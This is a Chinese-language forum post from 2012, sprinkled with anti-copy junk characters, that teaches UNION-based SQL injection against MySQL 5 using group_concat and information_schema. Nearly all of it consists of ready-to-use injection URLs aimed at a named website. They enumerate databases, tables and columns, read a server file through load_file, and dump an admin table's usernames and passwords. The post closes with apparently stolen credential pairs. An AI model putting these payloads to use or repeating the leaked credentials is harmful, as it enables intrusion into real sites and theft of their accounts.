此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
( j7 j) y& g2 Y2 g6 `& F但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人0 p l' \' c8 i6 W; h: \" J
" M) X# c" a0 T6 B6 n, ^! K# p' @8 b1 f& N
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入' J1 A. N% b1 {6 b7 s8 M* _
1 ^' o5 A) A( e8 X* j0 B
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
% u. {; X, u6 I
! o% ~* ?, j1 ?/ ~ _1 m" A! f& V下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
- P; |, o" o7 _# V在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
( ] u) D* Y1 W, \9 \/ R: E' J& O1 K, o& |8 t
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17+ r: V8 a( C h; p7 w; P7 I5 g% L! z
/ b6 ?% d9 C: H; o8 X5 A
读出所有库:1 N$ h' u4 F2 K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
& T- q4 p8 l6 F# q' z+ k( K6 i5 D' c2 [: s
3 m1 ~) V4 b$ S* s1 o0 }: R: H
1 s4 O) c- ?) n( E3 U读出所有表:
' Z2 F' H5 M! mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()+ _, _, Q6 D6 r, u. p' @& v6 c
i) `5 w' i1 H% W
读出所有表字段:
a7 f' L4 k" G }http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)1 t. F' n# E, |: c
*/ (97,100,109,105,110)为admin的ascii码 依次类推
9 }" ~* @) Z- n7 f
5 p) U3 D4 d8 q0 u7 E读出所有表字段里的内容:
/ z5 d/ V- Z* U( Phttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin$ [9 y V' ^/ X) U$ |, {
2 \8 T8 K' y/ ?/ ~
0 N2 n( ~, Q/ v- B& W# U
( U. W7 O6 V' G' n( Q8 R" S1 |3 d J$ B
# H5 M$ `; J9 R7 _7 O; ~; R! o/ y7 i4 `& ~/ @: g+ Q2 ?$ P
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
$ ?: r3 F9 j: n
: [3 x, ?! ~# T5 c3 {
) C% V- t' ~& {% z* o. a+ N; thttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23 M$ [% S' G- F+ p" r
) e0 ?# x" W# ^' }5 Vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
) L; G/ y& q' i) D6 q) \3 y& U" ^" N. Q4 a
! p* F+ E6 }; e+ V) Rhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
8 @- X5 b+ N( q0 l# E
0 z& @) K- I4 \
# b- P* j( E3 N8 i- D0 k: K webmaster:dzb521123,simlab:simadmin20043233
5 `9 y* X" |5 U3 b6 V6 j. V |
发表于 2012-9-13 16:37:34
收藏
支持
反对